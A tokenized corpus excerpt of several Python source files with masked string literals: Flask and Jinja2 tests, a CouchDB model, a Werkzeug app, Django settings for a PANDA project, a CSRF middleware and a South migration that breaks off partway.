<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> import pytest <EOL> import flask <EOL> from flask . _compat import PY2 <EOL> def test_explicit_instance_paths ( modules_tmpdir ) : <EOL> with pytest . raises ( ValueError ) as excinfo : <EOL> flask . Flask ( __name__ , instance_path = '<STR_LIT>' ) <EOL> assert '<STR_LIT>' in str ( excinfo . value ) <EOL> app = flask . Flask ( __name__ , instance_path = str ( modules_tmpdir ) ) <EOL> assert app . instance_path == str ( modules_tmpdir ) <EOL> def test_main_module_paths ( modules_tmpdir , purge_module ) : <EOL> app = modules_tmpdir . join ( '<STR_LIT>' ) <EOL> app . write ( '<STR_LIT>' ) <EOL> purge_module ( '<STR_LIT>' ) <EOL> from main_app import app <EOL> here = os . path . abspath ( os . getcwd ( ) ) <EOL> assert app . instance_path == os . path . join ( here , '<STR_LIT>' ) <EOL> def test_uninstalled_module_paths ( modules_tmpdir , purge_module ) : <EOL> app = modules_tmpdir . join ( '<STR_LIT>' ) . write ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> purge_module ( '<STR_LIT>' ) <EOL> from config_module_app import app <EOL> assert app . instance_path == str ( modules_tmpdir . join ( '<STR_LIT>' ) ) <EOL> def test_uninstalled_package_paths ( modules_tmpdir , purge_module ) : <EOL> app = modules_tmpdir . mkdir ( '<STR_LIT>' ) <EOL> init = app . join ( '<STR_LIT>' ) <EOL> init . write ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> purge_module ( '<STR_LIT>' ) <EOL> from config_package_app import app <EOL> assert app . instance_path == str ( modules_tmpdir . join ( '<STR_LIT>' ) ) <EOL> def test_installed_module_paths ( modules_tmpdir , modules_tmpdir_prefix , <EOL> purge_module , site_packages , limit_loader ) : <EOL> site_packages . join ( '<STR_LIT>' ) . write ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> purge_module ( '<STR_LIT>' ) <EOL> from site_app import app <EOL> assert app . instance_path == modules_tmpdir . join ( '<STR_LIT>' ) . join ( '<STR_LIT>' ) <EOL> def test_installed_package_paths ( limit_loader , modules_tmpdir , <EOL> modules_tmpdir_prefix , purge_module , <EOL> monkeypatch ) : <EOL> installed_path = modules_tmpdir . mkdir ( '<STR_LIT:path>' ) <EOL> monkeypatch . syspath_prepend ( installed_path ) <EOL> app = installed_path . mkdir ( '<STR_LIT>' ) <EOL> init = app . join ( '<STR_LIT>' ) <EOL> init . write ( '<STR_LIT>' ) <EOL> purge_module ( '<STR_LIT>' ) <EOL> from installed_package import app <EOL> assert app . instance_path == modules_tmpdir . join ( '<STR_LIT>' ) . join ( '<STR_LIT>' ) <EOL> def test_prefix_package_paths ( limit_loader , modules_tmpdir , <EOL> modules_tmpdir_prefix , purge_module , <EOL> site_packages ) : <EOL> app = site_packages . mkdir ( '<STR_LIT>' ) <EOL> init = app . join ( '<STR_LIT>' ) <EOL> init . write ( '<STR_LIT>' ) <EOL> purge_module ( '<STR_LIT>' ) <EOL> import site_package <EOL> assert site_package . app . instance_path == modules_tmpdir . join ( '<STR_LIT>' ) . join ( '<STR_LIT>' ) <EOL> def test_egg_installed_paths ( install_egg , modules_tmpdir , <EOL> modules_tmpdir_prefix ) : <EOL> modules_tmpdir . mkdir ( '<STR_LIT>' ) . join ( '<STR_LIT>' ) . write ( <EOL> '<STR_LIT>' <EOL> ) <EOL> install_egg ( '<STR_LIT>' ) <EOL> try : <EOL> import site_egg <EOL> assert site_egg . app . instance_path == str ( modules_tmpdir . join ( '<STR_LIT>' ) . join ( '<STR_LIT>' ) ) <EOL> finally : <EOL> if '<STR_LIT>' in sys . modules : <EOL> del sys . modules [ '<STR_LIT>' ] <EOL> @ pytest . mark . skipif ( not PY2 , reason = '<STR_LIT>' ) <EOL> def test_meta_path_loader_without_is_package ( request , modules_tmpdir ) : <EOL> app = modules_tmpdir . join ( '<STR_LIT>' ) <EOL> app . write ( '<STR_LIT>' ) <EOL> class Loader ( object ) : <EOL> def find_module ( self , name , path = None ) : <EOL> return self <EOL> sys . meta_path . append ( Loader ( ) ) <EOL> request . addfinalizer ( sys . meta_path . pop ) <EOL> with pytest . raises ( AttributeError ) : <EOL> import unimportable </s>
<s> """<STR_LIT>""" <EOL> import pytest <EOL> from jinja2 import Environment <EOL> from jinja2 . bccache import FileSystemBytecodeCache <EOL> from jinja2 . exceptions import TemplateNotFound <EOL> @ pytest . fixture <EOL> def env ( package_loader ) : <EOL> bytecode_cache = FileSystemBytecodeCache ( ) <EOL> return Environment ( <EOL> loader = package_loader , <EOL> bytecode_cache = bytecode_cache , <EOL> ) <EOL> @ pytest . mark . byte_code_cache <EOL> class TestByteCodeCache ( ) : <EOL> def test_simple ( self , env ) : <EOL> tmpl = env . get_template ( '<STR_LIT>' ) <EOL> assert tmpl . render ( ) . strip ( ) == '<STR_LIT>' <EOL> pytest . raises ( TemplateNotFound , env . get_template , '<STR_LIT>' ) </s>
<s> from datetime import datetime <EOL> from couchdb . schema import Document , TextField , BooleanField , DateTimeField <EOL> from couchy . utils import url_for , get_random_uid <EOL> class URL ( Document ) : <EOL> target = TextField ( ) <EOL> public = BooleanField ( ) <EOL> added = DateTimeField ( default = datetime . utcnow ( ) ) <EOL> shorty_id = TextField ( default = None ) <EOL> db = None <EOL> @ classmethod <EOL> def load ( self , id ) : <EOL> return super ( URL , self ) . load ( URL . db , id ) <EOL> @ classmethod <EOL> def query ( self , code ) : <EOL> return URL . db . query ( code ) <EOL> def store ( self ) : <EOL> if getattr ( self . _data , '<STR_LIT:id>' , None ) is None : <EOL> new_id = self . shorty_id if self . shorty_id else None <EOL> while <NUM_LIT:1> : <EOL> id = new_id if new_id else get_random_uid ( ) <EOL> docid = None <EOL> try : <EOL> docid = URL . db . resource . put ( content = self . _data , path = '<STR_LIT>' % str ( id ) ) [ '<STR_LIT:id>' ] <EOL> except : <EOL> continue <EOL> if docid : <EOL> break <EOL> self . _data = URL . db . get ( docid ) <EOL> else : <EOL> super ( URL , self ) . store ( URL . db ) <EOL> return self <EOL> @ property <EOL> def short_url ( self ) : <EOL> return url_for ( '<STR_LIT>' , uid = self . id , _external = True ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % self . id </s>
<s> """<STR_LIT>""" <EOL> from os import path <EOL> from sqlalchemy import create_engine <EOL> from werkzeug . wrappers import Request <EOL> from werkzeug . wsgi import ClosingIterator , SharedDataMiddleware <EOL> from werkzeug . exceptions import HTTPException , NotFound <EOL> from plnt . utils import local , local_manager , url_map , endpoints <EOL> from plnt . database import session , metadata <EOL> import plnt . views <EOL> SHARED_DATA = path . join ( path . dirname ( __file__ ) , '<STR_LIT>' ) <EOL> class Plnt ( object ) : <EOL> def __init__ ( self , database_uri ) : <EOL> self . database_engine = create_engine ( database_uri ) <EOL> self . _dispatch = local_manager . middleware ( self . dispatch_request ) <EOL> self . _dispatch = SharedDataMiddleware ( self . _dispatch , { <EOL> '<STR_LIT>' : SHARED_DATA <EOL> } ) <EOL> def init_database ( self ) : <EOL> metadata . create_all ( self . database_engine ) <EOL> def bind_to_context ( self ) : <EOL> local . application = self <EOL> def dispatch_request ( self , environ , start_response ) : <EOL> self . bind_to_context ( ) <EOL> local . request = request = Request ( environ , start_response ) <EOL> local . url_adapter = adapter = url_map . bind_to_environ ( environ ) <EOL> try : <EOL> endpoint , values = adapter . match ( request . path ) <EOL> response = endpoints [ endpoint ] ( request , ** values ) <EOL> except HTTPException , e : <EOL> response = e <EOL> return ClosingIterator ( response ( environ , start_response ) , <EOL> session . remove ) <EOL> def __call__ ( self , environ , start_response ) : <EOL> return self . _dispatch ( environ , start_response ) </s>
<s> VERSION = ( <NUM_LIT:0> , <NUM_LIT:5> , <NUM_LIT:0> , "<STR_LIT>" , <NUM_LIT:1> ) <EOL> def get_version ( ) : <EOL> if VERSION [ <NUM_LIT:3> ] == "<STR_LIT>" : <EOL> return "<STR_LIT>" % ( VERSION [ <NUM_LIT:0> ] , VERSION [ <NUM_LIT:1> ] , VERSION [ <NUM_LIT:2> ] ) <EOL> elif VERSION [ <NUM_LIT:3> ] == "<STR_LIT>" : <EOL> if VERSION [ <NUM_LIT:2> ] == <NUM_LIT:0> : <EOL> return "<STR_LIT>" % ( VERSION [ <NUM_LIT:0> ] , VERSION [ <NUM_LIT:1> ] , VERSION [ <NUM_LIT:3> ] , VERSION [ <NUM_LIT:4> ] ) <EOL> return "<STR_LIT>" % ( VERSION [ <NUM_LIT:0> ] , VERSION [ <NUM_LIT:1> ] , VERSION [ <NUM_LIT:2> ] , VERSION [ <NUM_LIT:3> ] , VERSION [ <NUM_LIT:4> ] ) <EOL> else : <EOL> return "<STR_LIT>" % ( VERSION [ <NUM_LIT:0> ] , VERSION [ <NUM_LIT:1> ] , VERSION [ <NUM_LIT:2> ] , VERSION [ <NUM_LIT:3> ] ) <EOL> __version__ = get_version ( ) </s>
<s> import datetime <EOL> import os <EOL> import django <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> SETTINGS = '<STR_LIT>' <EOL> DJANGO_ROOT = os . path . dirname ( os . path . realpath ( django . __file__ ) ) <EOL> SITE_ROOT = os . path . dirname ( os . path . dirname ( os . path . realpath ( __file__ ) ) ) <EOL> DEBUG = True <EOL> TEMPLATE_DEBUG = DEBUG <EOL> ADMINS = ( <EOL> ) <EOL> MANAGERS = ADMINS <EOL> LOGIN_URL = '<STR_LIT>' <EOL> LOGOUT_URL = '<STR_LIT>' <EOL> LOGIN_REDIRECT_URL = '<STR_LIT>' <EOL> SITE_ID = <NUM_LIT:1> <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:localhost>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> TIME_ZONE = '<STR_LIT>' <EOL> USE_TZ = True <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> USE_I18N = True <EOL> USE_L10N = False <EOL> LOCALE_PATHS = ( os . path . join ( SITE_ROOT , '<STR_LIT>' ) , ) <EOL> STATIC_ROOT = os . path . join ( SITE_ROOT , '<STR_LIT>' ) <EOL> STATIC_URL = '<STR_LIT>' <EOL> ADMIN_MEDIA_PREFIX = '<STR_LIT>' <EOL> STATICFILES_FINDERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> MEDIA_ROOT = '<STR_LIT>' <EOL> EXPORT_ROOT = '<STR_LIT>' <EOL> SECRET_KEY = '<STR_LIT>' <EOL> TEMPLATE_LOADERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> TEMPLATE_CONTEXT_PROCESSORS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> TEMPLATE_DIRS = ( <EOL> os . path . join ( SITE_ROOT , '<STR_LIT>' ) <EOL> ) <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> SESSION_COOKIE_AGE = <NUM_LIT> <EOL> AUTH_PROFILE_MODULE = '<STR_LIT>' <EOL> COMPRESS_ENABLED = False <EOL> import djcelery <EOL> djcelery . setup_loader ( ) <EOL> BROKER_TRANSPORT = '<STR_LIT>' <EOL> BROKER_URL = '<STR_LIT>' % DATABASES [ '<STR_LIT:default>' ] <EOL> CELERY_RESULT_DBURI = '<STR_LIT>' % DATABASES [ '<STR_LIT:default>' ] <EOL> CELERYD_HIJACK_ROOT_LOGGER = False <EOL> CELERYD_CONCURRENCY = <NUM_LIT:1> <EOL> CELERY_IGNORE_RESULT = True <EOL> CELERY_STORE_ERRORS_EVEN_IF_IGNORED = True <EOL> CELERYBEAT_SCHEDULE_FILENAME = '<STR_LIT>' <EOL> from celery . schedules import crontab <EOL> CELERYBEAT_SCHEDULE = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : crontab ( minute = <NUM_LIT:0> , hour = <NUM_LIT:2> ) , <EOL> '<STR_LIT>' : { '<STR_LIT>' : False } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : crontab ( minute = <NUM_LIT:30> , hour = <NUM_LIT:2> ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : crontab ( minute = <NUM_LIT:0> , hour = <NUM_LIT:4> ) <EOL> } <EOL> } <EOL> SOUTH_TESTS_MIGRATE = False <EOL> import south . logger <EOL> LOGGING = { <EOL> '<STR_LIT:version>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT:filename>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> * <NUM_LIT> * <NUM_LIT:5> , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT:filename>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> * <NUM_LIT> * <NUM_LIT:5> , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> } , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT:default>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False <EOL> } <EOL> } <EOL> } <EOL> SOLR_ENDPOINT = '<STR_LIT>' <EOL> SOLR_DATA_CORE = '<STR_LIT:data>' <EOL> SOLR_DATASETS_CORE = '<STR_LIT>' <EOL> SOLR_DIRECTORY = '<STR_LIT>' <EOL> PANDA_VERSION = '<STR_LIT>' <EOL> PANDA_DEFAULT_SEARCH_GROUPS = <NUM_LIT:10> <EOL> PANDA_DEFAULT_SEARCH_ROWS_PER_GROUP = <NUM_LIT:5> <EOL> PANDA_DEFAULT_SEARCH_ROWS = <NUM_LIT:50> <EOL> PANDA_SNIFFER_MAX_SAMPLE_SIZE = <NUM_LIT> * <NUM_LIT:100> <EOL> PANDA_SAMPLE_DATA_ROWS = <NUM_LIT:5> <EOL> PANDA_SCHEMA_SAMPLE_ROWS = <NUM_LIT:100> <EOL> PANDA_ACTIVATION_PERIOD = datetime . timedelta ( days = <NUM_LIT:30> ) <EOL> PANDA_AVAILABLE_SPACE_WARN = <NUM_LIT> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT:2> <EOL> PANDA_AVAILABLE_SPACE_CRITICAL = <NUM_LIT> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT:1> <EOL> PANDA_NOTIFICATIONS_TO_SHOW = <NUM_LIT:50> <EOL> PANDA_UNCATEGORIZED_ID = <NUM_LIT:0> <EOL> PANDA_UNCATEGORIZED_SLUG = '<STR_LIT>' <EOL> PANDA_UNCATEGORIZED_NAME = _ ( '<STR_LIT>' ) <EOL> MOMENT_LANGUAGE_MAPPING = { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> try : <EOL> from local_settings import * <EOL> except ImportError : <EOL> pass </s>
<s> from django . middleware . csrf import get_token <EOL> class CsrfCookieUsedMiddleware ( object ) : <EOL> """<STR_LIT>""" <EOL> def process_request ( self , request ) : <EOL> get_token ( request ) </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT:title>' , <EOL> self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT>' , max_length = <NUM_LIT> ) , <EOL> keep_default = False ) <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT:title>' , <EOL> self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT>' , max_length = <NUM_LIT> ) , <EOL> keep_default = False ) <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT:title>' , <EOL> self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT>' , max_length = <NUM_LIT> ) , <EOL> keep_default = False ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_column ( '<STR_LIT>' , '<STR_LIT:title>' ) <EOL> db . delete_column ( '<STR_LIT>' , '<STR_LIT:title>' ) <EOL> db . delete_column ( '<STR_LIT>' , '<STR_LIT:title>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:4>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' 